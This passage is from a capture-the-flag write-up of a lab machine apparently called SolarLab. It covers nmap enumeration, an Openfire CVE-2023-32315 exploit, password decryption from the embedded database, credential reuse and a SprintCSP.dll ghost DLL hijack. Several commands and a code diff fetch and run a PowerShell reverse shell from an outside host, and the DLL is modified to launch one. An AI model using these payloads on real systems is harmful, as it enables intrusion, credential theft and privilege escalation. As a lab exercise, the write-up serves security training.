5000/tcp open  upnp
5222/tcp open  xmpp-client
9090/tcp open  zeus-admin
```

`nmap` scan of the freshly exposed ports:

```console
opcode@debian$ nmap -sC -sV -p 5000,5040,5222,5223,5262,5263,5269,5270,5275,5276,5985,7070,7443,9090,9091 240.0.0.1
Nmap scan report for 240.0.0.1
Host is up (0.39s latency).

PORT     STATE SERVICE             VERSION
5000/tcp open  upnp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Connection: close
|     Content-Length: 2045
|     Content-Type: text/html; charset=utf-8
|     Date: Sat, 13 Jul 2024 10:45:22 GMT
|     Server: waitress
|     Vary: Cookie
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Login - ReportHub</title>
|     <style>
|     body {
|     font-family: 'Arial', sans-serif;
|     background-color: #f5f5f5;
|     margin: 0;
|     padding: 0;
|     display: flex;
|     flex-direction: column;
|     align-items: center;
|     height: 100vh;
|     .logo {
|     max-width: 200px;
|     margin-bottom: 20px;
|     display: block;
|     margin: 0 auto;
|     text-align: center;
|     color: #333;
|     form {
|     max-w
|   RTSPRequest: 
|     HTTP/1.0 400 Bad Request
|     Connection: close
|     Content-Length: 63
|     Content-Type: text/plain; charset=utf-8
|     Date: Sat, 13 Jul 2024 10:45:23 GMT
|     Server: waitress
|     Request
|     Start line is invalid
|_    (generated by waitress)
5040/tcp open  unknown
5222/tcp open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: TLS randomness does not represent time
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     features: 
|     unknown: 
|     auth_mechanisms: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     compression_methods: 
|     xmpp: 
|       version: 1.0
|     capabilities: 
|_    stream_id: 4ejzcc6i3v
5223/tcp open  ssl/hpvirtgrp?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after:  2028-11-15T12:22:21
| fingerprint-strings: 
|   JavaRMI, Kerberos, NCP, X11Probe: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5262/tcp open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     features: 
|     unknown: 
|     auth_mechanisms: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     compression_methods: 
|     xmpp: 
|       version: 1.0
|     capabilities: 
|_    stream_id: 9pkqna9iy4
5263/tcp open  ssl/unknown
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after:  2028-11-15T12:22:21
| fingerprint-strings: 
|   TerminalServerCookie, X11Probe: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5269/tcp open  xmpp                Wildfire XMPP Client
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     features: 
|     unknown: 
|     auth_mechanisms: 
|     errors: 
|       (timeout)
|     compression_methods: 
|     xmpp: 
|_    capabilities: 
5270/tcp open  xmp?
5275/tcp open  jabber
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     features: 
|     unknown: 
|     auth_mechanisms: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     compression_methods: 
|     xmpp: 
|       version: 1.0
|     capabilities: 
|_    stream_id: 9yed45udha
5276/tcp open  ssl/unknown
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   DNSVersionBindReqTCP, NCP: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after:  2028-11-15T12:22:21
5985/tcp open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7070/tcp open  realserver?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Sat, 13 Jul 2024 10:45:17 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Sat, 13 Jul 2024 10:45:24 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7443/tcp open  ssl/oracleas-https?
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after:  2028-11-15T12:22:21
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Sat, 13 Jul 2024 10:45:25 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Sat, 13 Jul 2024 10:45:31 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
9090/tcp open  zeus-admin?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Sat, 13 Jul 2024 10:45:18 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Sat, 13 Jul 2024 10:45:26 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   JavaRMI, drda, ibm-db2-das, informix: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   SqueezeCenter_CLI: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   WMSRequest: 
|     HTTP/1.1 400 Illegal character CNTL=0x1
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp open  ssl/xmltec-xmlmail?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Sat, 13 Jul 2024 10:45:39 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Sat, 13 Jul 2024 10:45:40 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after:  2028-11-15T12:22:21
|_ssl-date: TLS randomness does not represent time
```

Port 9090 is the Openfire Admin Console:

![3](images/3.png)

The version is 4.7.4. It is vulnerable to [CVE-2023-32315](https://www.vicarius.io/vsociety/posts/cve-2023-32315-path-traversal-in-openfire-leads-to-rce), a path traversal bug which leads to RCE.

A PoC is available at <https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT>

```console
opcode@debian$ wget https://raw.githubusercontent.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT/main/CVE-2023-32315.py
opcode@debian$ python3 CVE-2023-32315.py -u http://240.0.0.1:9090

 ██████ ██    ██ ███████       ██████   ██████  ██████  ██████        ██████  
██████  ██████   ██ ███████
██      ██    ██ ██                 ██ ██  ████      ██      ██            ██   
██      ██ ███ ██     
██      ██    ██ █████   █████  █████  ██ ██ ██  █████   █████  █████  █████   
█████   █████   ██ ███████
██       ██  ██  ██            ██      ████  ██ ██           ██            ██ ██
██  ██      ██
 ██████   ████   ███████       ███████  ██████  ███████ ██████        ██████  
███████ ██████   ██ ███████

Coded By: K3ysTr0K3R --> Hug me ʕっ•ᴥ•ʔっ

[*] Launching exploit against: http://240.0.0.1:9090
[*] Checking if the target is vulnerable
[+] Target is vulnerable
[*] Adding credentials
[+] Successfully added, here are the credentials
[+] Username: hugme
[+] Password: HugmeNOW
```

After logging in with the credentials `hugme:HugmeNOW`, we can upload a vulnerable plugin from <https://github.com/miko550/CVE-2023-32315> to <http://localhost:9090/plugin-admin.jsp>  
In `Server` > `Server Settings` > `Management Tool`, we can use the password 123 and choose `system command` from the drop-down to run arbitrary OS commands.  
I ran:

```console
powershell.exe IEX(IWR http://10.10.14.185:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.185 9001
```

And received a shell as `openfire`:

```console
PS C:\Program Files\Openfire\bin> whoami
solarlab\openfire
```

## Openfire embedded database - HSQL

On the Openfire Admin Console, under database (<http://240.0.0.1:9090/server-db.jsp>), it is implied that Openfire uses the embedded database HSQL Database Engine 2.4.1  
The DB Connection URL is also mentioned: `jdbc:hsqldb:C:\Program Files\Openfire\embedded-db\openfire`

Via googling, I learnt that `hsqldb.jar` can be used as client to connect to this database and is already present in `C:\Program Files\Openfire\lib\`  
Furthermore, Openfire already comes with scripts for interacting with the database:

```console
PS C:\Program Files\Openfire\bin\extra> cat .\embedded-db.rc
# Connection settings for the embedded Openfire database.
urlid embedded-db
url jdbc:hsqldb:../../embedded-db/openfire
username sa
password

PS C:\Program Files\Openfire\bin\extra> cat .\embedded-db-viewer.bat
@echo off

SET CLASSPATH=%~dp0..\..\lib\*

echo Starting embedded database viewer...

java -cp %CLASSPATH% org.hsqldb.util.DatabaseManagerSwing --rcfile embedded-db.rc --urlid embedded-db
```

However, when I ran this script, it failed:

```console
PS C:\Program Files\Openfire\bin\extra> .\embedded-db-viewer.bat
Starting embedded database viewer...
Error: Could not find or load main class Files\Openfire\bin\extra\..\..\lib\*
```

I fixed it to the following:

```console
java -cp ..\..\lib\* org.hsqldb.util.DatabaseManagerSwing --rcfile embedded-db.rc --urlid embedded-db
```

The command seems to get stuck after running. I realised that Database Manager is a GUI database query tool.  
At the end, I was overthinking things. HSQL database queries were stored in a `.script` file which could be read directly:

```console
PS C:\Program Files\Openfire\embedded-db> cat .\openfire.script    
SET DATABASE UNIQUE NAME HSQLDB8BDD3B2742
SET DATABASE GC 0
SET DATABASE DEFAULT RESULT MEMORY ROWS 0
SET DATABASE EVENT LOG LEVEL 0
[--SNIP--]
```

There are two important queries present:

```SQL
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')
[--SNIP--]
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
```

The schema for `OFUSER` can also be found:

```SQL
CREATE MEMORY TABLE PUBLIC.OFUSER(USERNAME VARCHAR(64) NOT NULL,STOREDKEY VARCHAR(32),SERVERKEY VARCHAR(32),SALT VARCHAR(32),ITERATIONS INTEGER,PLAINPASSWORD VARCHAR(32),ENCRYPTEDPASSWORD VARCHAR(255),NAME VARCHAR(100),EMAIL VARCHAR(100),CREATIONDATE VARCHAR(15) NOT NULL,MODIFICATIONDATE VARCHAR(15) NOT NULL,CONSTRAINT OFUSER_PK PRIMARY KEY(USERNAME))
```

We can use [openfire-password-decrypter](https://github.com/z3rObyte/openfire-password-decrypter) to decrypt the password:

```console
opcode@debian$ wget https://raw.githubusercontent.com/z3rObyte/openfire-password-decrypter/main/decrypter.py
opcode@debian$ python3 decrypter.py becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
Decrypted password: ThisPasswordShouldDo!@
```

We can test if it is reused for `Administrator`:

```console
root@1f370aed7dae:~# nxc smb 10.10.11.16 -d solarlab.htb -u 'Administrator' -p 'ThisPasswordShouldDo!@' --shares
SMB         10.10.11.16     445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [+] solarlab.htb\Administrator:ThisPasswordShouldDo!@ (Pwn3d!)
SMB         10.10.11.16     445    SOLARLAB         [*] Enumerated shares
SMB         10.10.11.16     445    SOLARLAB         Share           Permissions     Remark
SMB         10.10.11.16     445    SOLARLAB         -----           -----------     ------
SMB         10.10.11.16     445    SOLARLAB         ADMIN$          READ,WRITE      Remote Admin
SMB         10.10.11.16     445    SOLARLAB         C$              READ,WRITE      Default share
SMB         10.10.11.16     445    SOLARLAB         Documents       READ,WRITE      
SMB         10.10.11.16     445    SOLARLAB         IPC$            READ            Remote IPC
```

Therefore, we can obtain an Administrator shell using NetExec:

```console
root@1f370aed7dae:~# nxc winrm 240.0.0.1 -d solarlab.htb -u 'Administrator' -p 'ThisPasswordShouldDo!@' -X 'IEX(IWR http://10.10.14.185:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.185 9001'
```

Or using [RunasCs](https://github.com/antonioCoco/RunasCs):

```console
PS C:\Windows\Tasks> .\RunasCs.exe Administrator 'ThisPasswordShouldDo!@' 'powershell.exe IEX(IWR http://10.10.14.185:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.185 9001'
```

Or using [impacket](https://github.com/fortra/impacket)'s `psexec.py`

```console
opcode@debian$ psexec.py solarlab.htb/Administrator:'ThisPasswordShouldDo!@'@solarlab.htb
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on solarlab.htb.....
[*] Found writable share ADMIN$
[*] Uploading file IyXucUzl.exe
[*] Opening SVCManager on solarlab.htb.....
[*] Creating service kuvJ on solarlab.htb.....
[*] Starting service kuvJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19045.4355]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

## Unintended - Using Ghost DLL (SprintCSP.dll)

When enumerating with [PrivescCheck](https://github.com/itm4n/PrivescCheck), I had also noticed a quirk on this box:

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ PATH folder permissions                           ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether the current user has any write permissions on  ┃
┃ the system-wide PATH folders. If so, the system could be     ┃
┃ vulnerable to privilege escalation through ghost DLL         ┃
┃ hijacking.                                                   ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Vulnerable - High


Path              : C:\Users\blake\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\Scripts
ModifiablePath    : C:\Users\blake\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\Scripts
IdentityReference : SOLARLAB\blake
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
```

That directory is present in PATH and `blaze` has write permissions there.  
Ghost DLLs could potentially be used to abuse this oversight.

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ Known ghost DLLs                                  ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about services that are known to be prone to ┃
┃ ghost DLL hijacking. Note that their exploitation requires   ┃
┃ the current user to have write permissions on at least one   ┃
┃ system-wide PATH folder.                                     ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational


Name           : cdpsgshims.dll
Description    : Loaded by the Connected Devices Platform Service (CDPSvc) upon startup.
RunAs          : NT AUTHORITY\LocalService
RebootRequired : True
Link           : https://nafiez.github.io/security/eop/2019/11/05/windows-service-host-process-eop.html

Name           : WptsExtensions.dll
Description    : Loaded by the Task Scheduler service (Schedule) upon startup.
RunAs          : LocalSystem
RebootRequired : True
Link           : http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html

Name           : SprintCSP.dll
Description    : Loaded by the Storage Service (StorSvc) when the RPC procedure 'SvcRebootToFlashingMode' is invoked.
RunAs          : LocalSystem
RebootRequired : False
Link           : https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc
```

I went with `SprintCSP.dll` since it is most recent of the bunch. The attack is essentially DLL hijacking.  
`StorSvc` is a service which runs as `NT AUTHORITY\SYSTEM` and tries to load the missing `SprintCSP.dll` DLL when triggering the `SvcRebootToFlashingMode` RPC method locally. We can place a malicious DLL in a writable folder contained in the SYSTEM `%PATH%` and have it executed with SYSTEM privileges.

I cloned the repo <https://github.com/blackarrowsec/redteam-research.git> and made a small edit to `LPE via StorSvc/SprintCSP/SprintCSP/main.c`:

```diff
 void DoStuff() {

-    // Replace all this code by your payload
-    STARTUPINFO si = { sizeof(STARTUPINFO) };
-    PROCESS_INFORMATION pi;
-    CreateProcess(L"c:\\windows\\system32\\cmd.exe",L" /C whoami /all > C:\\ProgramData\\whoamiall.txt",
-        NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, L"C:\\Windows", &si, &pi);

-    CloseHandle(pi.hProcess);
-    CloseHandle(pi.hThread);
+    WinExec("powershell.exe IEX(IWR http://10.10.14.185:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.185 9001", SW_HIDE);
     return;
 }
```

Then, I opened the solution for `RpcClient` with Visual Studio, set the configuration to `x64 Release`, selected `RpcClient` in Solutions Explorer and used <kbd>Ctrl</kbd>+<kbd>B</kbd> to build.

I repeated the same for `SprintCSP`.  
Afterwards, I transferred `RpcClient.exe` and `SprintCSP.dll` to the target, put the dll in PATH and executed `RpcClient.exe`:

```console
PS C:\Windows\Tasks> iwr 10.10.14.185:8000/GhostDLL/RpcClient.exe -o RpcClient.exe
PS C:\Windows\Tasks> iwr 10.10.14.185:8000/GhostDLL/SprintCSP.dll -o SprintCSP.dll
PS C:\Windows\Tasks> mv .\SprintCSP.dll C:\Users\blake\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\Scripts\SprintCSP.dll
PS C:\Windows\Tasks> .\RpcClient.exe
[+] Dll hijack triggered!
```

And I obtained a shell as `nt authority\system` in the service group `LocalSystemNetworkRestricted` but that is enough:

```console
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name               Description                         State   
============================ =================================== ========
SeTcbPrivilege               Act as part of the operating system Enabled 
SeLoadDriverPrivilege        Load and unload device drivers      Disabled
SeBackupPrivilege            Back up files and directories       Disabled
SeRestorePrivilege           Restore files and directories       Disabled
SeSystemEnvironmentPrivilege Modify firmware environment values  Disabled
SeChangeNotifyPrivilege      Bypass traverse checking            Enabled 
SeManageVolumePrivilege      Perform volume maintenance tasks    Disabled
```
